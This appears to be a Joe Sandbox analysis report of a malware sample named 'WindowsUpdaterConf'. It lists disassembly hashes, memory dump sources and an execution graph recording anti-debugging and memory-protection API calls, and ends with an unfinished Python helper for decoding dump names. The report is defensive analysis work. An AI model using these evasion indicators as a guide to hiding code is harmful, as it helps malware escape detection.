                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d9b5349a69b63f2d3d21cd355e7d6f044959bfbfdfc6fb3ba9df8a852c7916d
                                                                                          • Instruction ID: e62f378cd8094611c3b17eff7498d028d9954f3fa8f15ffcf77ea5dada3aed9a
                                                                                          • Opcode Fuzzy Hash: 0d9b5349a69b63f2d3d21cd355e7d6f044959bfbfdfc6fb3ba9df8a852c7916d
                                                                                          • Instruction Fuzzy Hash: 03014B78A003188FD754DB24C88879A77F6FF89315F00C4A9A509A7265DB35AE45CF14
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55125bdf7d9db5e19f5c8c604c019cba7df6fcf6a0c79661f5c77937a2003257
                                                                                          • Instruction ID: 839432170b2cdf976f30c26ad0ae80f19f6541ccbbc8eaa24c369ead1f01964c
                                                                                          • Opcode Fuzzy Hash: 55125bdf7d9db5e19f5c8c604c019cba7df6fcf6a0c79661f5c77937a2003257
                                                                                          • Instruction Fuzzy Hash: 23F01D30304200CBD714FF76E5A966A32A6FB86786B40C028D7064739DCF289C01EF96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20c9345c28e61abe5fee368fa18859bff0da9eb43b41c10033bb53b3021c383f
                                                                                          • Instruction ID: 05165c3684a01ab1ad55b16e920839f2591523805ea7f9622297aa3f54eef89a
                                                                                          • Opcode Fuzzy Hash: 20c9345c28e61abe5fee368fa18859bff0da9eb43b41c10033bb53b3021c383f
                                                                                          • Instruction Fuzzy Hash: 49F05E74A40218CFD754DB14CC887AD7772FB45315F008495E60AE7350DB359E84DF05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction ID: cbc88206fe2d2e1ab2c634cea7f6db3969baee1306ad5e6010a3cffaa585187e
                                                                                          • Opcode Fuzzy Hash: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction Fuzzy Hash: 15E0E5B4A00218CFD754DF24D8897ADBBB2FB89305F00C499E619A7354DB346E84CF04
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ead4ae575f7ebf291613e6c6ee227f520b70bdd68a50950c9ffdd9e05c3b509
                                                                                          • Instruction ID: 8eb65273a47d91ce7b5a621eddfd1442d8eab502a3fe2ed38fb7626e67b244b1
                                                                                          • Opcode Fuzzy Hash: 6ead4ae575f7ebf291613e6c6ee227f520b70bdd68a50950c9ffdd9e05c3b509
                                                                                          • Instruction Fuzzy Hash: 74D09E75941208ABCB00DFE4990959E7BF9EB4A210B1049E59505D7221EE319E106F91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd61c030c702fcbc36e577bf930b284f8355d3ffd7443323cb675784b83f3757
                                                                                          • Instruction ID: c9cfa8fd03c2bf16c0da716cd84d01e59739ffcabbf3568e4f51dd8ad9f8a207
                                                                                          • Opcode Fuzzy Hash: fd61c030c702fcbc36e577bf930b284f8355d3ffd7443323cb675784b83f3757
                                                                                          • Instruction Fuzzy Hash: DBD067B4A801148FCB94DF64E8D87DCB7B2BB49301F50C8AAA61AE32A0DE304D84CF14
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4dc2e4432f210c07e584201bc4aa585cc3adb63f8be79feba54404d39103dbd7
                                                                                          • Instruction ID: 67b123c0e3182d5c3bfd4706939262d426c5e14c572ed9e77721f31de9043402
                                                                                          • Opcode Fuzzy Hash: 4dc2e4432f210c07e584201bc4aa585cc3adb63f8be79feba54404d39103dbd7
                                                                                          • Instruction Fuzzy Hash: 54C02B3015010887C301B755E01449A339EC3C9B15F408028D2050734ACF282C018F91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad1347c973a15eafe58cbb1f118e6926e816b39d91cc1d2e744c4d45a0b20e7f
                                                                                          • Instruction ID: 17338295012eb7008aa5b46e356e1a540564a2eecaee7377b518255b90d1a6ba
                                                                                          • Opcode Fuzzy Hash: ad1347c973a15eafe58cbb1f118e6926e816b39d91cc1d2e744c4d45a0b20e7f
                                                                                          • Instruction Fuzzy Hash: AAC002B8A843048FCB145B74A85C3ED7AA2BB4A341F418465B957C2360EB3889409A15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af9561b4dea037b670769931fb3ce16ea39220011c4067ee9db308e0c9cb485d
                                                                                          • Instruction ID: 1028892d4c95858abd13de0163b32d466d347e9791880165049e4b70aeb89209
                                                                                          • Opcode Fuzzy Hash: af9561b4dea037b670769931fb3ce16ea39220011c4067ee9db308e0c9cb485d
                                                                                          • Instruction Fuzzy Hash: 38A02230002B0CC2820032B02002020338CCA80208B8000B8A30C08A232A33E8A088B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 705d62e0ee83c14adf7037c4abb7ad15acf785219037a21aa7bb679e0b2c89da
                                                                                          • Instruction ID: 015eade396225e73b348479914f514c9b7606e0bd423df0ea225f09f95463bbd
                                                                                          • Opcode Fuzzy Hash: 705d62e0ee83c14adf7037c4abb7ad15acf785219037a21aa7bb679e0b2c89da
                                                                                          • Instruction Fuzzy Hash: BFA0243001170CC7C30017717004410735CD70013F3400474D10C005114737D410CD50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1c400aef75b0a4f50cd020c4c2c8b636acca4d52898ff302e86c3e1206348bb9
                                                                                          • Instruction ID: cd60b73651bffc60893a341c295a66c60dd62f7ee46f35da7c0f01dadb286920
                                                                                          • Opcode Fuzzy Hash: 1c400aef75b0a4f50cd020c4c2c8b636acca4d52898ff302e86c3e1206348bb9
                                                                                          • Instruction Fuzzy Hash: 7D90023108460CCB46406799784979E775CB5495197844051F50D515119A5D64104595
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 056f790d9ce19f1a83eb1cb518398157bf67b2f6662e809126127ddb5898e701
                                                                                          • Instruction ID: 028da550343493ed84c79b73c3b7b4fc384fd2b0c182de36b345fbe37bdd7187
                                                                                          • Opcode Fuzzy Hash: 056f790d9ce19f1a83eb1cb518398157bf67b2f6662e809126127ddb5898e701
                                                                                          • Instruction Fuzzy Hash: AAB011382802088BC3008B00CE8C3AA3A23AB80302F0082A0A003A22A0CB30AC80AE00

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5343 58d2c50 5344 58d2c6e 5343->5344 5347 58d2dd0 5344->5347 5351 58d2e08 5347->5351 5354 58d2e03 5347->5354 5348 58d2cbb 5352 58d2e4c CheckRemoteDebuggerPresent 5351->5352 5353 58d2e8e 5352->5353 5353->5348 5355 58d2e08 CheckRemoteDebuggerPresent 5354->5355 5357 58d2e8e 5355->5357 5357->5348 5339 ee8b40 5340 ee8b80 CloseHandle 5339->5340 5342 ee8bb1 5340->5342 5358 ee0850 5360 ee0859 5358->5360 5362 ee3be2 5358->5362 5365 ee34bd 5358->5365 5368 ee88c0 5362->5368 5367 ee88c0 VirtualProtect 5365->5367 5366 ee34d6 5367->5366 5370 ee88d3 5368->5370 5372 ee8970 5370->5372 5373 ee89b8 VirtualProtect 5372->5373 5375 ee3bf8 5373->5375

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 0 5998c18-5998c83 call 5990040 call 599bf28 6 5998c89-599bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 5137468445a98c473d1527aeab45dc4ff0e6fcc25339b4991a25d01bf3aef58c
                                                                                          • Instruction ID: 09baa13ee468c204a5ad9684d81fc712c2f9c5248c8cdb771817959024ad906d
                                                                                          • Opcode Fuzzy Hash: 5137468445a98c473d1527aeab45dc4ff0e6fcc25339b4991a25d01bf3aef58c
                                                                                          • Instruction Fuzzy Hash: 90534034A052188FDB54EF24D99569EBBF2FB88705F5091E9D90DA7385EB309E81CF80

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 610 5994dc3 611 5994dc7 610->611 612 5994dc8-5994dc9 611->612 613 5994dca-5994dcd 612->613 614 5994e59-5994e67 613->614 615 5994dce-5994dd3 613->615 621 5994f7f-5994f8d 614->621 636 5994e6d-5994e74 614->636 615->614 616 5994e79-5994ea6 615->616 617 5994fdb-5994fee 615->617 618 5994dda-5994dde 615->618 619 5994f9d-5994fcb 615->619 620 5994e3c-5994e4d 615->620 615->621 622 599501e-5995020 615->622 623 5994e16-5994e29 615->623 624 5994eab-5994ee5 615->624 625 5994eea 615->625 626 599502c-599503e 615->626 627 5994e2e-5994e3a 615->627 628 5995040 615->628 616->613 629 5994ff0-5995002 617->629 618->612 631 5994ddf-5994e14 618->631 619->625 654 5994fd1-5994fd6 619->654 620->627 642 5994e4f-5994e54 620->642 621->616 643 5994f93-5994f98 621->643 622->628 632 5995022-599502a 622->632 623->629 624->613 635 5994ef6-5994f7a 625->635 639 599500c-5995015 626->639 627->613 629->639 631->613 632->639 635->613 636->611 639->626 645 5995017 639->645 642->613 643->613 645->622 645->626 645->628 654->613
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq
                                                                                          • API String ID: 0-814193904
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 058D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421838741.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_58d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 058D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421838741.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_58d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00EE89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2298948110.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_ee0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-2408637067
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2298948110.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_ee0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86ecd7a865ea8fc40af431f04f2ca056c370f0e1eea972fd8d9599cef56e029f
                                                                                          • Instruction ID: a69b6d340a53689321748e633eb1417b892f7aee15ceed66821b888d3d97d38a
                                                                                          • Opcode Fuzzy Hash: 86ecd7a865ea8fc40af431f04f2ca056c370f0e1eea972fd8d9599cef56e029f
                                                                                          • Instruction Fuzzy Hash: 25C02B3022810843C3013648F01609A378EC3C9F05F401020E10507787CE202D00C790
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e37b4f699be36cfb6bf5edb9bca4d3c2759b778227770500acf3c0fe10bed67f
                                                                                          • Instruction ID: e1b9af623289fbbd0f8e49210275020b68afdb4030629329578bc6c88a325594
                                                                                          • Opcode Fuzzy Hash: e37b4f699be36cfb6bf5edb9bca4d3c2759b778227770500acf3c0fe10bed67f
                                                                                          • Instruction Fuzzy Hash: D5C04CB4A04304CFCF14EB75A81C35D7AA2FB48341F5045A7A84BE33A0EF344944CB15
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b79e60dabd0e01e923c46aa7ccacdbea98ad2564c739fd0a1b2f72f6169561cb
                                                                                          • Instruction ID: b3b1384b379a6d910175d373bcaaebed15f95593456ef9dbb3265c50666a8a5e
                                                                                          • Opcode Fuzzy Hash: b79e60dabd0e01e923c46aa7ccacdbea98ad2564c739fd0a1b2f72f6169561cb
                                                                                          • Instruction Fuzzy Hash: 22A00231046B4C8696153AF6750252573DC99C1619B9024B9A60C19B2359B7E8E18599
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b182b51923b72a5130b047136bc49bbf5940b37bb955f0a01a585754b52c81f6
                                                                                          • Instruction ID: 859378edefbcd5e7c79717bd0e351970242afadf2eb9658cde73b37d0ba55c36
                                                                                          • Opcode Fuzzy Hash: b182b51923b72a5130b047136bc49bbf5940b37bb955f0a01a585754b52c81f6
                                                                                          • Instruction Fuzzy Hash: D7A0243001570CC7C3001770700D410775CD50111734040F4F10C005315F33D010C550
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ef341258515e3f50744f5f83f621a22687b49225c3bb407176408e1f0387d83
                                                                                          • Instruction ID: c7de731b18ae64aecfeaccf354be0f76621cf032d8ecaff8154c0aeba3d20e76
                                                                                          • Opcode Fuzzy Hash: 2ef341258515e3f50744f5f83f621a22687b49225c3bb407176408e1f0387d83
                                                                                          • Instruction Fuzzy Hash: 2290023104460CCF4640379A780966A775CA644519BD40053E50D616116A5968244595
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9aa7a8cf2b5c6a9f15a67d1103b175cb06655c07009abff7297194ecea21290
                                                                                          • Instruction ID: be4d82f2a12867d4974ecbbd59639770c46ee0d4718b75a35cf058a7936beb63
                                                                                          • Opcode Fuzzy Hash: e9aa7a8cf2b5c6a9f15a67d1103b175cb06655c07009abff7297194ecea21290
                                                                                          • Instruction Fuzzy Hash: A1B011302002088FCB08EB08CE0C2AA3222AB80302F0002A2A00AA22A08B302C88CA00
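Each "Memory Dump Source" entry above identifies the region a function was recovered from only through two file names. The Python below is an added example, not part of the Joe Sandbox report, that decodes those names and checks them against each other. The dotted field layout of the .sdmp name (process number, dump index, dump id, base address, PAGE_* protection, then fields this example leaves raw) is an assumption inferred from the names on this page, and the helpers `parse_dump_source`, `same_region` and `looks_like_unpacked_code` are this example's own. Decoded, the entry above is process 27, dump 2, base 0x5990000, PAGE_EXECUTE_READWRITE, not backed by a PE image, which is consistent with the 100% dynamic/decrypted code coverage and the VirtualProtect calls recorded elsewhere in this section.

```python
"""Decode the memory-dump identifiers printed in the "Memory Dump Source" entries
above (the .sdmp name and the hcaresult_*.jbxd snapshot name) and cross-check
that the two describe the same region.

Added example, not from the report or from Joe Sandbox. The field layout is an
assumption inferred from the names on this page: .sdmp field 1 = the report's
process number (0x1B = 27, matching hcaresult_27_...), field 2 = dump index,
field 4 = region base, field 5 = PAGE_* protection; remaining fields are kept raw.
"""
import re

# PAGE_* memory protection values from winnt.h.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

SDMP_RE = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<rest>[0-9A-Fa-f.]+)\.sdmp$")
SNAPSHOT_RE = re.compile(
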